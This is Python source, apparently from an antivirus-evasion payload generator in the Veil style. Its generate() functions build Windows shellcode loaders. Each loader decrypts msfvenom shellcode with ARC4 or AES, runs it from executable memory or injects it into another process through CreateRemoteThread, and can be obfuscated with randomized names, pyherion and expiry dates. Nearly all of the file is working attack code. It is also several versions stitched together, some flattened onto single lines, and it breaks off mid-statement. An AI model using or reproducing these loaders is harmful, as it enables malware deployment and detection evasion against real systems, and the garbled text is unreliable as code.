            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
            PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            # HEAP_CREATE_ENABLE_EXECUTE (0x00040000): an executable private heap, sized 2x the shellcode
            PayloadCode += HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
            # HEAP_ZERO_MEMORY (0x00000008)
            PayloadCode += RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandARCKey = helpers.randomString()
            RandARCPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            HeapVar = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'import ctypes as avlol\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            # expiry gate, as in the virtual branch
            PayloadCode += RandToday + ' = datetime.now()\n'
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
            PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\'))\n'
            PayloadCode += '\t' + HeapVar + ' = avlol.windll.kernel32.HeapCreate(avlol.c_int(0x00040000),avlol.c_int(len(' + ShellcodeVariableName + ') * 2),avlol.c_int(0))\n'
            PayloadCode += '\t' + RandPtr + ' = avlol.windll.kernel32.HeapAlloc(avlol.c_int(' + HeapVar + '),avlol.c_int(0x00000008),avlol.c_int(len( ' + ShellcodeVariableName + ')))\n'
            PayloadCode += '\t' + RandBuf + ' = (avlol.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
            PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
    else:
        # any INJECT_METHOD other than "virtual"/"heap" (including typos) lands here:
        # the decrypted bytes go into a ctypes string buffer that is cast to a
        # function pointer and called, with no page-protection change
        if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            # NOTE(review): RandPtr, RandBuf, RandHt and RandReverseShell are never emitted in this branch
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandARCKey = helpers.randomString()
            RandARCPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()
            RandMemoryShell = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'from ctypes import *\n'
            PayloadCode += RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
            # plain str here (no bytearray) because create_string_buffer takes the str directly
            PayloadCode += ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
            # presumably relies on the process allowing execution from this buffer's pages -- confirm DEP assumptions
            PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            # note: no trailing newline on the final call
            PayloadCode += RandShellcode + '()'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta( days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            # NOTE(review): RandPtr, RandBuf, RandHt and RandReverseShell are never emitted in this branch
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            ShellcodeVariableName = helpers.randomString()
            RandIV = helpers.randomString()
            RandARCKey = helpers.randomString()
            RandARCPayload = helpers.randomString()
            RandEncShellCodePayload = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()
            RandMemoryShell = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            # encrypt the shellcode and get our randomized key/iv
            (EncShellCode, (ARCKey, iv)) = encryption.encryptARC(Shellcode)
            PayloadCode = 'from Crypto.Cipher import ARC4\n'
            PayloadCode += 'from ctypes import *\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            # expiry gate, as in the other branches
            PayloadCode += RandToday + ' = datetime.now()\n'
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[ 2:] + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            PayloadCode += '\t' + RandIV + ' = \'' + iv + '\'\n'
            PayloadCode += '\t' + RandARCKey + ' = \'' + ARCKey + '\'\n'
            PayloadCode += '\t' + RandARCPayload + ' = ARC4.new(' + RandARCKey + ')\n'
            PayloadCode += '\t' + RandEncShellCodePayload + ' = \'' + EncShellCode.encode( "string_escape") + '\'\n'
            PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandARCPayload + '.decrypt(' + RandEncShellCodePayload + ').decode(\'string_escape\')\n'
            PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
            PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += '\t' + RandShellcode + '()'
            if self.required_options["USE_PYHERION"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
def generate(self): if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() pid_num_variable = helpers.randomString() pagerwx_variable = helpers.randomString() processall_variable = helpers.randomString() memcommit_variable = helpers.randomString() shell_length_variable = helpers.randomString() memalloc_variable = helpers.randomString() prochandle_variable = helpers.randomString() kernel32_variable = helpers.randomString() # Create Payload code PayloadCode = 'from ctypes import *\n\n' PayloadCode += pagerwx_variable + ' = 0x40\n' PayloadCode += processall_variable + ' = 0x1F0FFF\n' PayloadCode += memcommit_variable + ' = 0x00001000\n' PayloadCode += kernel32_variable + ' = windll.kernel32\n' PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n' PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n' PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n' PayloadCode += prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n' PayloadCode += memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n' PayloadCode += kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n' PayloadCode += kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() 
expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate(self.required_options) # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() pid_num_variable = helpers.randomString() pagerwx_variable = helpers.randomString() processall_variable = helpers.randomString() memcommit_variable = helpers.randomString() shell_length_variable = helpers.randomString() memalloc_variable = helpers.randomString() prochandle_variable = helpers.randomString() kernel32_variable = helpers.randomString() # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += pagerwx_variable + ' = 0x40\n' PayloadCode += processall_variable + ' = 0x1F0FFF\n' PayloadCode += memcommit_variable + ' = 0x00001000\n' PayloadCode += kernel32_variable + ' = windll.kernel32\n' PayloadCode += ShellcodeVariableName + ' = \"' + Shellcode + '\"\n' PayloadCode += pid_num_variable + ' = ' + self.required_options["PID_NUMBER"][0] +'\n' PayloadCode += shell_length_variable + ' = len(' + ShellcodeVariableName + ')\n\n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + prochandle_variable + ' = ' + kernel32_variable + '.OpenProcess(' + processall_variable + ', False, ' + pid_num_variable + ')\n' PayloadCode += '\t' + memalloc_variable + ' = ' + kernel32_variable + '.VirtualAllocEx(' + prochandle_variable + ', 0, ' + shell_length_variable + ', ' + memcommit_variable + ', ' + pagerwx_variable + ')\n' PayloadCode += '\t' + kernel32_variable + '.WriteProcessMemory(' + prochandle_variable + ', ' + memalloc_variable + ', ' + 
ShellcodeVariableName + ', ' + shell_length_variable + ', 0)\n' PayloadCode += '\t' + kernel32_variable + '.CreateRemoteThread(' + prochandle_variable + ', None, 0, ' + memalloc_variable + ', 0, 0, 0)\n' if self.required_options["USE_PYHERION"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 
'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' 
PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode if self.required_options["inject_method"][0].lower() == "heap": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' 
PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = 
helpers.randomString() RandExpire = helpers.randomString() HeapVar = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'import ctypes\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n' PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n' PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n' PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n' 
PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += RandPadding + ' = \'{\'\n' PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n' PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # 
Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandShellcode = helpers.randomString() RandReverseShell = helpers.randomString() RandMemoryShell = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = 'from ctypes import *\n' PayloadCode += 'from Crypto.Cipher import AES\n' PayloadCode += 'import base64\n' PayloadCode += 'import os\n' PayloadCode += 'from datetime import datetime\n' PayloadCode += 'from datetime import date\n\n' PayloadCode += RandToday + ' = datetime.now()\n' PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n' PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n' PayloadCode += '\t' + RandPadding + ' = \'{\'\n' PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n' PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n' PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n' PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n' PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + 
ShellcodeVariableName + '))\n' PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n' PayloadCode += '\t' + RandShellcode + '()' if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode
def generate(self): if self.required_options["inject_method"][0].lower() == "virtual": if self.required_options["expire_payload"][0].lower() == "x": # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = "import ctypes\n" PayloadCode += "from Crypto.Cipher import AES\n" PayloadCode += "import base64\n" PayloadCode += "import os\n" PayloadCode += RandPadding + " = '{'\n" PayloadCode += ( RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n" ) PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n" PayloadCode += ( RandDecodedShellcode + " = " + RandDecodeAES + "(" + RandCipherObject + ", '" + EncodedShellcode + "')\n" ) PayloadCode += RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n' PayloadCode += ( RandPtr + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(" + RandShellCode + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n" ) PayloadCode += ( RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n" ) PayloadCode += ( "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(" + RandPtr + ")," + RandBuf + ",ctypes.c_int(len(" + RandShellCode + ")))\n" ) PayloadCode += ( RandHt + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(" + RandPtr + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n" ) PayloadCode += ( 
"ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n" ) if self.required_options["use_pyherion"][0].lower() == "y": PayloadCode = encryption.pyherion(PayloadCode) return PayloadCode else: # Get our current date and add number of days to the date todaysdate = date.today() expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0]))) # Generate Shellcode Using msfvenom Shellcode = self.shellcode.generate() # Generate Random Variable Names ShellcodeVariableName = helpers.randomString() RandPtr = helpers.randomString() RandBuf = helpers.randomString() RandHt = helpers.randomString() RandDecodeAES = helpers.randomString() RandCipherObject = helpers.randomString() RandDecodedShellcode = helpers.randomString() RandShellCode = helpers.randomString() RandPadding = helpers.randomString() RandToday = helpers.randomString() RandExpire = helpers.randomString() # encrypt the shellcode and grab the randomized key (EncodedShellcode, secret) = encryption.encryptAES(Shellcode) # Create Payload code PayloadCode = "import ctypes\n" PayloadCode += "from Crypto.Cipher import AES\n" PayloadCode += "import 